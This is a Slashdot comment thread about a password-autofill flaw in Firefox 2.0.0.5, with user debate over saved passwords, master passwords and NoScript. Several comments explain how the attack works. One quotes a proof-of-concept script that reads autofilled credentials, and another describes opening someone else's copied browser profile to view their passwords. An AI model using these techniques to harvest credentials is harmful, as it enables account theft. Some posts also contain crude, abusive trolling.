Password Vulnerability In Firefox 2.0.0.5

Paris The Pirate writes "According to a message posted over the weekend on the Full-Disclosure mailing list, the latest version of Firefox, 2.0.0.5, contains a password management vulnerability that can allow malicious Web sites to steal user passwords. If you have JavaScript enabled and allow Firefox to remember your passwords, you are at risk from this flaw."

Is this OS independent?

[sexybomber]

I haven't RTFA (after all, this is Slashdot), but are all OSes equally vulnerable?

Re:Is this OS independent?

[Compholio]

I haven't RTFA (after all, this is Slashdot), but are all OSes equally vulnerable?

I can confirm that it works on Linux.

Re:Is this OS independent?

[Mr.+Sketch]

From what I read, yes. It only exposes passwords for the site you're visiting. The most common case of this is on myspace, where visiting a malicious website will transfer your myspace username/password to the website owner. This vulnerability exists on sites that allow users to post custom html and javascript and will expose your username and password for that site.

This does not expose all your passwords, so if you have you bank password stored, it's safe, unless your bank has pages that allow users to post custom html and javascript.

Re:Is this OS independent?

[slagell]

Or unless you use the same password for myspace and a bunch of other places

Re:Is this OS independent?

[PPH]

Memo to self: Take my /. password, 'ImADork' off my bank account.

Re:Is this OS independent?

[Simon+Donkers]

I have enabled the master password and the proof of concept fails. It launches a window asking me for my master password before filling in any passwords.

Note that the master password on it's own still is not secure because you only need to type it in once until you restart your browser but combined with the add-on Master Password Timeout you are relatively safe. Just don't browse dodgy websites minutes after logging in.

Re:Is this OS independent?

[jsse]

I can confirm that it works on AmegaOS, Atrai, Sinclair ZX81 and PDP too.

Well...actually I can't. If you excuse me, I'll go back to my corner where I can dialog with my shadow.

Re:Is this OS independent?

[snowgirl]

You know... this is one reason why I don't store ANY of my passwords for webpages anywhere but my head.

Granted my IMs all store my password, because I want them to log in automatically, but I just simply do not trust a webbrowser to keep any of my passwords.

Re:Is this OS independent?

[0olong]

Actually you're safe if you use a master password with your password manager. This solution has the benefit that you can use any amount of unique strong passwords for different sites while you only need to remember one.

Re:Is this OS independent?

[snowgirl]

Actually you're safe if you use a master password with your password manager.

Well this story kind of points out why obviously, this statement isn't necessarily true.

Re:Is this OS independent?

I already changed your bank password for ya.

Dork.

Re:Is this OS independent?

[RealGrouchy]

I haven't RTFA (after all, this is Slashdot), but are all OSes equally vulnerable? I can confirm that it works on Linux. TFA, or the vulnerability?

- RG>

Re:Is this OS independent?

[xsadar]

This does not expose all your passwords, so if you have you bank password stored, it's safe . . .

It may be safe from this particular vulnerability, but I would never consider a stored password to be safe.

Re:Is this OS independent?

[VJ42]

Whilst I keep my web mail, bank and other important passwords in my head, I have no problem letting my browser remember my /. password or the ones for any number of random forums that I am a member of; or letting it remember the password I got from bugmenot so I could read some article on a site that has no need of my personal info besides data harvesting (For some reason newspapers do this a lot).

It's not as if someone changing the password on my /. account would do me any real harm, it's a weak password anyway, so why should I bother having to type it in very time I visit?

Re:Is this OS independent?

[dougmc]

You know... this is one reason why I don't store ANY of my passwords for webpages anywhere but my head. ... which probably means that your your webpage passwords are probably all the same, or many are the same, or you just don't use many web sites that make you log in. Or you have superhuman memory, of course.

Which is worse? Keeping the same password everywhere, or risking that there might be a hole in your browser at some point? (Or that somebody might hack into your box and copy the entire password file.) I'll have to say the first.

Still, keeping your bank password (and other passwords that really matter) in your head is a good plan. But using the same password for systems that are controlled/administerred separately? Bad idea.

Re:Is this OS independent?

[McNihil]

Err.. you misspelled n1nc0mp00p

Re:Is this OS independent?

[rapidweather]

..and allow Firefox to remember your passwords..

In Rapidweather Remaster of Knoppix Linux, my livecd linux distro, I always set up Firefox _not_ to remember passwords.
I put Firefox 2.0.0.5 in the Remaster just last week.
Also, when the user closes Firefox, I have it set up so the entire ~/.mozilla is deleted. I presume that is where any password would reside. In the event of a Firefox crash, the ~/.mozilla is not deleted without an OK from the user. There is a dialog box that comes up and asks "Did you want to close Firefox?".
So, even though I do have Javascript enabled, I would assume from the discussion that the current, "in-use" password is safe. Usually, when I do online banking, I follow the recommendation to "close the browser", and with the above setup where ~/.mozilla is deleted, I should be safe.

Rapidweather

Re:Is this OS independent?

[snowgirl]

Ah, I generally use the website's password storage for that.

Of course, I love when I use a "I forgot my password" program and they email me my password. It's like, "Um..... thanks?"

I swear... seriously, everyone seems to have really poor password security, so I have a standard throw-away password for random sites that I don't particularly care if they go one way or the other.

Re:Is this OS independent?

[asrail]

No if you've more than one login for that site, so it won't auto-complete.

Test it... save two logins and try the exploit.

Re:Is this OS independent?

[PPH]

Thanks, dude.

While you're logged on, could you send me a couple of bucks for the weekend? If there's anything left, that is.

Re:Is this OS independent?

[doom]

sexybomber wrote:

I haven't RTFA (after all, this is Slashdot),

Listen: you don't get cute points on this kind of schtick, what you get is a big flashing sign on your head saying "I AM AN IDIOT".

(Unfortunately, you did get karma out of it, because there are some moderators out there with similar equipment.)

Dupe?

[InvisblePinkUnicorn]

Three days ago: http://it.slashdot.org/article.pl?sid=07/07/20/125 2215

Re:Dupe?

[the.WZA]

Yes. It's a dupe.

Re:Dupe?

[denttford]

Yeah, the title seems to indicate that there is a vulnerability with specific to the new FF release, but no. Same story.

Same solution (for FF) - which I got from a post in the previous story (thank you): Secure Login.

Re:Dupe?

[Zekasu]

It's not a "dupe" per se, but it has been posted before.

...and then again.

... and again.

... and then again.

The only new bit of information about this is that it was disclosed in a meeting, which could be significant or insignificant, depending on the way you look at it.

Password Remember Function

[EveryNickIsTaken]

This is one of the reasons why the "remember my passwords" function is only used by idiots.

Re:Password Remember Function

[SatanicPuppy]

Eh. Depends on what passwords you set it to remember. There are a ton of BS passwords that I don't give a damn if someone steals.

Like anywhere else, you need to make a trade off between usability and security. Sure, it's not perfectly secure, but it's not worth it to me to have to remember the one off junk password I made up for NYTimes.com.

The real issue, as usual, is javascript. I use "NoScript" and am careful about which sites I allow to execute scripts at all. That will do more for your security than anything else.

Re:Password Remember Function

[mdm-adph]

Same for me -- important passwords, like my bank's online account access, I never allow anything to save, not even Firefox.

Re:Password Remember Function

[bensode]

It's not a vulnerability ... it's a IE migration to Firefox feature!

Re:Password Remember Function

Ah yes, the old "you are an idiot if you don't do things the way I do them" argument. Are we grumpy because we are out of Clearasil today? Or did mommy start asking for basement rent?

Re:Password Remember Function

[bahwi]

Meh, if someone has access to my computer physically anyways they can get all my passwords by installing a keylogger anyways. The vulnerability only affects the sites that let people post custom html/javascript. Those sites are just social sites like myspace and other stuff and who cares if someone gets your password for that.

Re:Password Remember Function

[Tridus]

I knew Post It Notes were more secure!

Re:Password Remember Function

[tygerstripes]

Regardless of people's feelings on having their social-site password stolen, if this vulnerability allows someone on a social networking site to find your other passwords... oh, why am I bothering.

Re:Password Remember Function

[DigitAl56K]

Who modded the parent post "Insightful", and why? It is a one line blanket statement cast against millions of people without discussion or foundation. I hope someone takes away your mod points.

If you use many websites that require you to log in you don't have many options. You could use one password for all of them, in which case a breach on one account by an attacker essentially breaches all other accounts that they discover, or you can use unique passwords on each site, in which case it soon becomes impossible to remember them all accurately - especially for sites that you don't use very often. Additionally, some sites have rules around the number of upper case characters, special characters, digits, etc. in passwords, and these can be particularly difficult to remember.

Certainly people are foolish if they store logins for bank accounts and the like in the password manager, but most people only have one or two really important logins.

People who use the remember passwords functions are not idiots. People who expect the "remember passwords" functionality to be secure are not idiots either - if an application used by millions includes such functionality one would expect the developers to have secured it.

Re:Password Remember Function

[eck011219]

There are a couple issues here. First of all ...

Those sites are just social sites like myspace and other stuff and who cares if someone gets your password for that.

You'd probably begin to care after someone "hacks" your MySpace page and posts distasteful or illegal language or images. Explaining all of that to a police officer or a judge and jury is rife with peril.

But the other point I think is pertinent here is that Firefox is really going for the common man crowd -- you don't buy a full-page ad in the New York Times if you want only geeks. So knowing that the average joe will be using Firefox and will happily save sensitive information if encouraged to do so (as one is with Firefox), that particular feature really has to be pretty rock-solid (or at the very least, not vulnerable to a pretty basic and classic javascript exploit).

Don't get me wrong -- I love Firefox and use it almost exclusively. But this is the kind of thing that, whether truly a hazard to most users or not, can scare people away if it is carelessly presented to the public. Or if it really is a risk.

Re:Password Remember Function

[EveryNickIsTaken]

So, just because millions of people use it, expecting it to be secure, then it is suddenly a good idea to do so? Please... Millions of people use their real CC or debit card numbers when purchasing online (instead of one-off "disposable" numbers) - despite the inherent security threats... Does that suddenly become a good idea because millions of people use it, expecting it to be secure?

Re:Password Remember Function

Why do idiots still spread the FUD that it is bad or a "security threat" to use their credit card online? You are perfectly safe. If someone does steal and use your number you are only responsible for the first $50, and every bank I've ever dealt with if waive that. Idiots like you are the reason it took me so long to convince my mom not use use PERSONAL CHECKS an eBay. Because of the FUD about credit cards, I had a hard time explaining to her that they were MUCH safer than checks! You are MORE vulnerable using your credit card in a "real" store than online.

Re:Password Remember Function

[Vexorian]

I actually think gp is right to one extent.

For the sites I don't care about I use the same generic old password that I have used from 2003, I mean, if they are stolen I just risk a bunch of of dummy email addresses and other crappy services I don't really care too much about. For the things that matter I keep though and strong passwords that I better remember and not "write them down" or let a browser keep them... Often things that matter are just 3 so memory is not an obstacle...

Re:Password Remember Function

[networkBoy]

Yes, but a patch is less than three weeks plus a day away (I'm betting less than 48 hours), whereas with a MS product that would be the earliest you could expect a patch (sans DRM issue). In all likely hood a MS patch would be 7 weeks away.
-nB

Re:Password Remember Function

[eck011219]

You're right -- I'm not arguing anything on behalf of other browsers (particularly IE -- as a guy who lives and breathes CSS all day, that alone has me hating IE). I'm just saying that the anyman's browser needs to provide protection IF it offers it. You could certainly make the password saving function an option you turn on instead of have to turn off. But that kind of hides it from new users who don't know where to look (or that there's anything to look for). I think better encryption defaults (like the creation of an administrative password as mentioned elsewhere) might be a better tactic.

Re:Password Remember Function

[LoverOfJoy]

Why must every decision either be the best, most secure, or one made by an idiot? Aren't there decisions that may not be the ideal or may have some downsides to that aren't made by idiots?

Re:Password Remember Function

[dmpyron]

If it has anything to do with money, or some place where I can be made to look like an idiot, I don't. If it's one of my travel agency sites, why not? The only thing you can do is book some travel, and I get the commission.

Re:Password Remember Function

Who modded the parent post "Insightful", and why? It is a one line blanket statement cast against millions of people without discussion or foundation. I hope someone takes away your mod points.

Sorry -- that was me!

Re:Password Remember Function

[dwater]

> You are MORE vulnerable using your credit card in a "real" store than online.

Care to back that up?

Re:Password Remember Function

Actually, IE has never automatically populated the username/password... that's quite stupid on FX's part. In IE, you have to fill in the username manually and it will auto-fill the password (if it was one you told it to remember). Require user action.

ho ho ho

Posted here as well - ho ho ho Slashdot is late again!.

Re:ho ho ho

[include($dysmas)]

wrong.

http://it.slashdot.org/article.pl?sid=07/07/20/125 2215

Re:ho ho ho

^ not troll.

Do not save passwords

[Normal+Dan]

I never liked firefox's save password ability. It stores the password in plane text (at least it used to) for anyone with physical access to see if they know where to look (and it's not hard to figure out where to look). I have stolen many a passwords this way. It is worse than writing your password down and putting it in your desk.

Re:Do not save passwords

[Mascot]

That's what the "Master Password" option is for.

Use a master password

        Firefox can protect sensitive information such as saved passwords
        and certificates by encrypting them using a master password. If you create a
        master password, each time you start Firefox, it will ask you to enter
        the password the first time it needs to access a certificate or stored
        password.

Re:Do not save passwords

[dvice_null]

Passwords are not in plain text, but readable with Firefox.

You can set master password to truely encrypt them. But if you let people to access your harddrive, you can install keyloggers to steal the master password also. Or any password, no matter do you save it or not.

Re:Do not save passwords

or turn off JavaScript, and be also immune to the hundred other JavaScript-based attacks that have been found, and the hundred that will be found in the next 10 years.

Re:Do not save passwords

It stores the password in plane text (at least it used to) for anyone with physical access to see if they know where to look (and it's not hard to figure out where to look). I have stolen many a passwords this way. It is worse than writing your password down and putting it in your desk.

Even worse, because it uses plane text, you are helping the terrorists, who can now hijack your passwords and fly them into skyscrapers!

Re:Do not save passwords

[piojo]

I never liked firefox's save password ability. It stores the password in plane text (at least it used to) for anyone with physical access to see if they know where to look (and it's not hard to figure out where to look).

I don't know whether they are in plaintext, but it matters very little. I found someone's firefox profile directory on my school's network, and looked for passwords because I was bored. I couldn't see anything, so I just copied the profile to my computer, and fired up firefox using that profile. It happily showed me all the passwords at my request. I think the same procedure would work for opera, or any browser that stores passwords. Obfuscated passwords probably only protect you from your younger siblings. (The older ones found your porn collection years ago.)

Now, there is one way I can think of that would make the obfuscation better. The browser could encrypt the passwords using the URL that they go to as the encryption key. (Obviously, the browser could not store this information with the password.) When a user browsed to www.example.com, the browser couldn't ask, "Do we have a saved password for www.example.com?" but it would instead say, "Here are all my passwords... when decrypted with the key, 'example.com', do they yield plaintext that looks like it could be a password?"

This approach is not really secure (because crackers would just take password lists and try decryption keys like "paypal.com" and "ebay.com" to get common/important passwords), but it has the advantage that it is impossible to start with no knowledge and end up with a list of site,username,password sets.

Re:Do not save passwords

[suv4x4]

It stores the password in plane text

Shit, that's totally insecure! Way to go, Mozilla!

Re:Do not save passwords

[strobert]

In addition if you run with Noscript and Secure Login it really helps protect you. The former can let you disable javascript (and java/flash too) by default and only enable for sites you trust. The later makes it so that for remembered passwords firefox does not fill in the form. Instead it highlights the fields it would fill in and you have to hit the secure login button to post the form data. Makes it so that you know when you saved passwords are being used and bypasses the input flow so that keyloggers can't even record the data.

I would also recommend installing "Master Password Timeout" which will re-prompt you periodically for the password.

Re:Do not save passwords

yeah and the plane text is always flying away LOL!

Re:Do not save passwords

Why steal passwords???.....what U need em for? huh?

Re:Do not save passwords

[eln]

Pretty much all text is plane text. Unless it's 3 dimensional I guess.

Re:Do not save passwords

[ma1wrbu5tr]

"plane text" .... is that the stuff printed on barf bags?

Re:Do not save passwords

[My+name+is+Bucket]

Let me get this straight...
You don't want to go through the trouble of memorizing and typing in passwords, so you store them. But then, you don't want your passwords to get intercepted so it prompts you for a password every time you have to enter a password so you don't have to enter a password every time it prompts you. Now you conveniently have all your passwords managed by a single password which is better than having a single password for all your accounts because you don't want a cracker getting access to all your online services at once just by acquiring a single password.

Makes perfect sense.

Re:Do not save passwords

[TigerTime]

I don't want to be nagged with entering a password everytime i open up Firefox. What i want is all of my passwords to be secured or completely hidden from everyone. I don't know how to look up my passwords in IE, but in Firefox it's right there in "plane" site.

What Firefox needs to do is when you click on the "Show Passwords" link, the user must be required to enter in the "Master Password" then and only then. That's the only time it's really necessary to go to an extra level of security.

Passwords are personal, and they shouldn't be visible to anyone you happen to let use your computer for a second. And I don't want to have to type in the "Master Password" anytime they want to check their email.

Re:Do not save passwords

[organgtool]

It stores the password in plane text

So your password is probably one of the entries here

Re:Do not save passwords

[LordKronos]

Did I detect a hint of sarcasm? Well then let me explain it for you.

Suppose you signup for online banking and setup a password. Then you signup for some stupid website and use the same password. The problem is, you don't know if you can trust that 2nd site with your online banking password. They may just be phishing for passwords. Or maybe they are honest but incompetent enough to store your password in the DB in plain text, conveniently waiting there for the next hacker to locate.

The solution: Use separate passwords for the 2 sites? But then how do you start partitioning things? Do all the banking sites get the same password, your email a different password, you photo website a separate password, etc? Can you even trust all banks to have the same password? Perhaps it would be safer to use a different password for each one.

By now you are looking at dozens of different passwords. Trouble is...how do you remember them all? Write them all down? Thats a big no-no. However, what if you put them in a text file and then encrypted the file? Now you only have to remember 1 thing...the decryption key, and that NEVER has to be given to anyone.

But no, I guess sarcastic mocking is funner, isn't it?

Re:Do not save passwords

[SleepyHappyDoc]

Write them all down? Thats a big no-no.

I really don't understand why this is considered insecure. My front door gets much fewer intrusion attempts than my firewall, and I have a very secure system in place there to restrict access (a deadbolt). If someone did break into my house and stole my password list, I'd know as soon as I got home, rather than having to wait until I see suspicious activity on my accounts. I get why keeping your work password on a sticky-note in your cubicle is a bad idea, but I don't see why it would be so bad for home users, where physical access is already restricted.

Re:Do not save passwords

[TheVelvetFlamebait]

It is worse than writing your password down and putting it in your desk.

You're right! From now on, I'm going to write all my passwords, with the sites they correspond to, on a sheet of paper pinned to my desk. Any leet hacker looking through my computer will be so frustrated with the lack of a password manager file, that they'll just completely forget to look on the desk beside them, right? Right?

Re:Do not save passwords

[Mascot]

Passwords are personal, and they shouldn't be visible to anyone you happen to let use your computer for a second.

If you use the master password, they are not. Regardless of whether you have already been prompted for it, it will ask again if you try to reveal passwords in the list "show passwords".

Re:Do not save passwords

[LordKronos]

Because my post wasn't addressing your specific scenario, but a general scenario instead. It might not be your personal banking password (which you use as home) that we are referring to. Instead, it might be passwords you use at the office, including internal accounts (email, accounting database, website administration), external business accounts(accounts with suppliers and other business partners, administering the retirement and health insurance plans, etc), and maybe even some personal accounts that you access on your lunch hour.

Open Sores Get Whats Coming To Them

Thats what you get for your 'security through open sores' lectures we have had to endure over the years.

I'm going log in to your email and send your mother all the gay porn I can find.

That horny slut will love having all that cock on her screen.

Re:Open Sores Get Whats Coming To Them

[grub]

I'm going log in to your email and send your mother all the gay porn I can find.

That would be found in a tarball of your home directory.

Re:Open Sores Get Whats Coming To Them

[BlueParrot]

link?

Re:Open Sores Get Whats Coming To Them

[networkBoy]

ftp://127.0.0.1/home

Duplicate?

http://finance.yahoo.com/q?s=SPZI.PK

Or Firefox for that matter

[benhocking]

All the truly intelligent people use Lynx.

No Problem

[Mostly+a+lurker]

"... If you have JavaScript enabled and allow Firefox to remember your passwords, you are at risk from this flaw."

Will not effect me: I have a notoriously bad memory for passwords.

Re:No Problem

It's good that you don't let your passwords define you, but the real question is whether or not this will affect you.

Re:No Problem

[petercruickshank]

You mean your memory is so bad, even your copy of Firefox can't remember passwords?

Low security passwords

[benhocking]

Eh. Depends on what passwords you set it to remember. There are a ton of BS passwords that I don't give a damn if someone steals.

Absolutely. My Slashdot password, for example, is one that I allow Firefox to remember. Er, not that I'm claiming Slashdot is BS or anything. ;)

NoScript

[grub]

NoScript
Repeat ad nauseum.

Re:NoScript

[Aladrin]

No joke, right? I forget the exact vulnerability that recently made me install NoScript, but there's been enough cross-site scripting, ajax, and stored-password exploits recently to make anyone paranoid.

Re:NoScript

[that+IT+girl]

I guess it could be exploited even through the sites you allow, though.
Just another reason not to save your passwords. It's as easy to get to that as it is if I saved all my passwords in a document on my desktop, labeled "Passwords". Pfft.

Re:NoScript

[grub]

Funny thing. The first and only cross-site warning I've had with NoScript was on our corporate webmail site.

Re:NoScript

ad nauseAM

Easy to remember: it is just like when you puke darling.

Re:NoScript

[Aladrin]

It's like a condom... It's not there because it's necessary every time. It's there for the one time you really really need it.

Re:NoScript

[LuSiDe]

I guess it could be exploited even through the sites you allow, though.

True, but you only add sites you trust which severely lowers the chances.

One can certainly save their passwords. Just don't save them directly in an monolithic application which is highly interactive with the Internet such as a web browser. Use something like a virtual wallet such as KDE's Kwallet (GNOME has a similar feature). This way you assign complex passwords (8 random characters, alpha-numeric, CaSe SeNsiTiVe) e.g. made with the command apg which you all save in your Kwallet (or applications such as LUKS, GELI, GPG, or TrueCrypt can be used for this purpose). Your Kwallet you put a master password on, and this is the only password you have to remember. Various applications can directly access Kwallet (KDE applications such as Konqueror) however should your application not support this you can manually open your Kwallet.

Should you use LUKS, GELI, GPG, or TrueCrypt be sure to close the mount point after you accessed the data. Eventually, one could put this on their PDA using that to store the data instead of directly on a machine connected to the Internet. Although I don't have a PDA, I do like this setup. You securely save your passwords and have them with you whole time, but it does cost time and energy to retrieve the password. Hence, you do have a backup, while your data cannot be read from the desktop(s) themselves, whereas you circumvent becoming too lazy to remember your passwords because accessing the data on PDA costs a minute or so.

Re:NoScript

[Bacon+Bits]

NoScript is a horrible fix for this, because NoScript and the password manager use the same method to determine what is safe: the domain name of the server.

If I go to, say, Blogspot.com with FF and I'm a member, I probably log in and save my password with FF. If I have NoScript and I visit the page frequently and post lots of comments, I also probably have blogspot.com on the trusted site list. If I go to a malicious blog (well, alright, a blog that exploits this vulnerability -- they're all malicious) then a) I'll be on a site that the password manager trusts and I'll be on a site that NoScript trusts.

Re:NoScript

[networkBoy]

Well... I guess it's better than a car analogy.
-nB

Re:NoScript

[Aladrin]

Crap. I'll try harder next time. Fix-a-flat maybe? Wouldn't need much change in the wording, either.

Re:NoScript

[Nozsd]

How is NoScript a fix? If you browse sites with scripting ON as the default, wouldn't it be a little too late to turn off scripting after visiting a malicious site? And how would you know a site is malicious if you browse sites with scripting OFF as the default? You might think the site is safe and turn on scripting only to find out it wasn't safe at all, but then it's too late.

Re:NoScript

Browsing with scripting defaulted to ON is retarded. That's why sane people run NoScript and allow sites on a case-by-case basis. True, a malicious site could be whitelisted, but running with the equivalent of the whole Internet whitelisted isn't very smart.

Re:NoScript

[Kingrames]

Then don't go to blogspot.com.
If the website allows that kind of malicious behavior, then they need to change.

Re:NoScript

[Bacon+Bits]

Yes, that's brilliant. I guess we don't need to worry about IE security flaws either, then? They have workarounds, too! Ah well, and /. has such fun railing MS for it, too.

Re:NoScript

[ekhben]

That said, is there a good Add-on for Firefox that handles password-management more securely? Something that keeps them stored in an encrypted format would be a step in the right direction.

They look encrypted to me. Base 64 encoded text that decodes to unprintable characters, for both username and password. Of course, I don't have a master password set, so anyone who knows the encryption scheme used by Firefox would be able to decode them in any case. And even if I did use a master password, my browser is happy to supply my slashdot username and password to anything in the "slashdot.org" domain. So the discussed vulnerability would still apply.

If you're using the same password everywhere, why have FF remember it for you? If not, who gives a shit if some lame duck web site lets any old user put HTML and Javascript carelessly on their domain name, you're only losing your password to a web site you probably should avoid anyway (hint: any old user putting any old JS on a site means every possible browser vulnerability will be attacked and exploited sooner or later, NoScript the site or don't visit).

Re:NoScript

the fault has to lay somewhere, dumbass. where does the fault lay here ? hundreds of maliciouswebsites.blogspot.com . is it your fault ? no. is it blogspot.com fault ? yes. you still want to use this web site ? you may have a bigger prohlem than you think, sir.

Re:NoScript

[tbetz]

The current version of NoScript allows you to permit or deny javascript based on the fqdn.

So if I allow javascript on myblog.blogspot.com, I can continue to deny it on blogspot.com in general.

Re:NoScript

[Bacon+Bits]

And every site on the Internet is like this? They *all* use the FQDN to distinguish one page from another?

Passwords in general

[the.nourse.god]

And this is why I save all of my passwords in IE

This is why we need something better that text passwords for authentication on the web. Most people can't remember all the passwords they use on every site they go to. To cope with this, Average Users do either one of two things - use the password remembering method in their browser of choice or use the same (weak) password for everything. Granted, there are some decent password management utilities out there, but your Average User would rather use a tool they already have.

Re:Passwords in general

The best password manager is a pencil and a piece of paper. At work or if there are others besides you at home, the third tool in the password manager set is a locked drawer.

Re:Passwords in general

OpenID/CardSpace?

Re:Passwords in general

[CBravo]

This is why we need something better that text passwords for authentication on the web. Well you could use a USB stick which emulates a keyboard that can insert username/password combinations. Or you could use standard encryption methods... (signing, etc).

Wimp

[missing000]

Real men use telnet for every IP session.

Re:Wimp

[dattaway]

telnet is for weenies.

netcat is for men.

Re:Wimp

i just attach the cables to my nipples and decode the packets manually.

Re:Wimp

[rleibman]

i just attach the cables to my nipples and decode the packets manually.

Yeah, but can you generate outbound traffic?

Re:Wimp

[crazyvas]

Netcat over telnet is for men with weenies.

Re:Wimp

[kayditty]

telnet is a protocol laid upon TCP (and, more commonly, a program translating that protocol to standard output). it would be impossible for me to use it for every "IP session," since there are other IP protocols that make use of sessions (some of which I do use).

Re:Wimp

[uradu]

> decode the packets manually

Manually?! Wouldn't your hands be otherwise engaged?

Re:Wimp

[LordEd]

Outbound traffic is sent back on a different port.

Re:Wimp

[gentooligan]

Using tc-pee-dump

Dupe? Of course!

[IBBoard]

Yeah, it's the same issue. On the plus side, they don't link to the same article (unless you count the fact that this one links to an article that links to the article from the old one)

Not as bad as you think.

It's not possible for websites to steal saved passwords from other websites; it's only possible to steal a password if Firefox auto-fills a password field, and obviously this only occurs if you're on website you saved the password for in the first place.

Reading my list of saved passwords; my company intranet sites aren't vulnerable, my bank website isn't vulnerable, my shopping sites aren't vulnerable. All that is vulnerable are forum websites, and that's only if someone finds a way to inject Javascript, which is normally stripped out by all of them.

I don't think it's possible to avoid this without serious hijinks to the DOM; it has always been possible to inspect the current contents of form inputs, including password inputs.

Please Help!!

[The+Real+Normal+Dan]

Very funny you jerk! You steal my password, then mock me on my slashdot account! Is there an admin around? -The Real Normal Dan

Again?

[HouseArrest420]

How is this news again? If you have enough knowledge to post a slashdot article, its certainly not your first time here, and one would hope you saw the SAME issue from 3-6 days ago.

Meh

As the announcement says:

"evil" server pages can steal passwords from browsers whether the user has opted for password management by Firefox or not.

It's the website's responsibility not to allow evil JavaScript on its domain. If they do - well, then all bets are off anyway...

FUD

[jrumney]

Firefox's password file has never been in plain text, although if you don't specify a master password, the decryption key is stored in the same directory, so the encryption will only stop casual opportunists.

Re:FUD

[laddiebuck]

Last I checked, it's just base64-encoded -- no encryption by default.

Re:FUD

More FUD. The results of the encryption are base64 encoded, so if by "last I checked" you mean "I glanced at it and concluded incorrectly", then it might appear that way.

Stealing passwords? Hardly...

[goldspider]

This isn't theft, it's liberation! Information (including passwords) wants to be free!

NoScript

[Junior+J.+Junior+III]

On the subject of Jasascript-enabled security holes, I use Javascript because so many sites depend on it, but block all scripts using NoScript until I decide to trust the domain of origin of the script. What I'd really like is a NoScript that will let me look at the script's source code before I decide to trust it, and allow/deny scripts on a per-script rather than per-domain basis.

That said, is there a good Add-on for Firefox that handles password-management more securely? Something that keeps them stored in an encrypted format would be a step in the right direction.

Firefox only?

[IBBoard]

Is Firefox really that insecure for this compared to the others? Yes, it auto-fills it but then any site that lets other people add Javascript to a page is vulnerable in an almost identical way. The main part of the script (on a timer to allow for auto-population) is:

function doit()
{
  name = document.passtest.name.value;
  password = document.passtest.password.value;
  alert("Your username is: " + name + " and the password is: " + password);
}

All you need is to know the form on the page, subscribe to the submit event and snag the password contents for yourself and you've busted any browser wide open (as long as it lets you enter usernames and passwords) without the need to exploit password saving. You could even potentially listen for Ctrl+Enter key combos in Opera, although catching the use of the wand might be more difficult.

Re:Firefox only?

[IBBoard]

Just before someone starts "Firefox Fanboi!"ing at me, I do know there's a way where only Firefox's password remembering could be exploited. That situation is when you do what the demo does, but hide the forms through CSS, so the user won't see them but Firefox still auto-populates.

Still, I think the fact that a website lets you include Javascript (which could then let you steal any password entered on the page, remembered or not) is a *much* bigger vulnerability. There are just so many ways you could exploit and abuse that!

Re:Firefox only?

[LouisLePegue]

Is there a Bugzilla ticket on that ? why not ?

Re:Firefox only?

Well, really, it is the auto-fill thing. I use Netscape, which has a fairly similar password manager to Firefox's, but doesn't autofill the password unless you tell it to. Opera doesn't either; that's been mentioned. While it's probably still possible to catch the events in both of those browsers that do the password fill, the likelihood of those events firing is probably fairly small because people won't have any motivation to use Opera's wand or Netscape's Fill (or Fill-And-Submit) features without needing to. So, I think the fact that FF does autofill passwords in addition to uids makes it rather more vunerable to this kind of attack than browsers like Netscape and Opera that don't.

And by the way, just because it's really the site's vunerability doesn't mean that the browsers can't or shouldn't fix it.

Re:Firefox only?

[IBBoard]

A bugzilla ticket on what? The main exploit or the general ability to access a form field (albeit a password one) via JavaScript from within a web page?

I'd imagine the first one has been Bugzilla'd a bit, especially after these articles. The second one may have been, but AFAIK it's part of the standard and so my "the website shouldn't allow user-inserted JavaScript" comments from the other two posts apply.

FIXED

[giorgosts]

https://addons.mozilla.org/en-US/firefox/addon/442 9 Secure Login Lots and lots of settings for every taste

An extension to help you...

[Aleksej]

Secure Login

Re:An extension to help you...

[Aleksej]

That's what you get for writing one short and one long message in one comment, and then splitting them in two: someone else has posted the short one in the meantime.

Re:An extension to help you...

[e_AltF4]

Using it for some time and it seems to stop the vulnerability.

Recommended if you are lazy (as i am) and allow FF to manage your passwords.

Re:NoScript [MOD PARENT UP!]

Alleluja!

Actually this is piece of news is a dupe of a dupe of a dupe...

If you go online without noscript, you're braindead...

Not so critical

[Klaidas]

Sure, it's a big issue, yet how many peope actually use the "remember my password" feature? I just usually check the "remember me" box near the login and password entering fields, or enter my passwords manually.

Re:Not so critical

[IBBoard]

I do, because some sites log me off after so long and I have so many combinations of similar passwords that I don't want to get locked out while trying them ;)

Re:Not so critical

[compro01]

i use it at work, but all the sites i use it for are internal sites that aren't accessible from outside our network, so i don't see any issue for me.

Is it Firefox specific?

[140Mandak262Jamuna]

From what I understand, the user visits a site and the browser dishes out the remembered username password to that site. Whenever that site requests the username and password, the browser would do so. If the site allows anyvisitor to post javascript code and it incorporates such posted code as part of its own page, then the user too can use javascript to request the username/password and use javascript to phone home.

Now why any of it is Firefox specific? Any browser/ browser-helper-object /password help toolbar would do the same. If you have only one user name for a site, firefox will pre-fill the field. And the javascript can read it without a get or post. I would guess this behaviour of prefilling when the username is unique is probably a Firefox thing.

Generally sites that allow users to post javascript code would be dangerous and should not be visited. But I would not know a priori these sites.

Re:Is it Firefox specific?

[makomk]

Bingo! Notice that, in the demo, the password form and the malicious page are on the same domain. JavaScript's security model is not designed to protect against situations like this - even if Firefox only filled in the password on the actual password form and not the malicious page, the malicious page could just load up the password form in a frame and use cross-frame scripting to retrieve the password. This is a non-event.

I love FireFox BUT...

[thanksforthecrabs]

I use FireFox for 95% of my browsing (mainly because of no ActiveX and AdBlock Plus, but I've always wondered if being open source means that code monkeys can write script to steal password just by simply knowing how the browser works...not by taking advantage of a published security hole...

Re:I love FireFox BUT...

[Vexorian]

It also means that bugs get fixed faster and that if mozilla stops supporting a platform someone else can, and that we can have things like swiftfox available, so I think it is a good trade.

But security through obscurity doesn't really work too well anyways...

Re:I love FireFox BUT...

[IBBoard]

Possibly, but how many bugs have been exploited in Firefox because of being able to view the source code and how many would have been picked up by a closed-source 'fuzzing' anyway?

This one was a "how the browser works" based on visible behaviour, so it would have been found in a closed-source app as well.

Re:I love FireFox BUT...

[DnasTheGreat]

To steal passwords when physically sitting at the computer, yes. But this is true with proprietary browsers as well, they just find where it's stored, i.e. security through obscurity, which doesn't work. There'll always be someone who figures out how to crack it, if nothing else, by de-assembling the binary. And once it's cracked once and announced, it's gone.

(If you use the Master Password feature so that your passwords are encrypted. Then open source or not doesn't matter. (Actually it helps, because then people can make sure the encryption is secure.) The catch is that you have to type in your Master Password occasionally or even Firefox can't get to the passwords.)

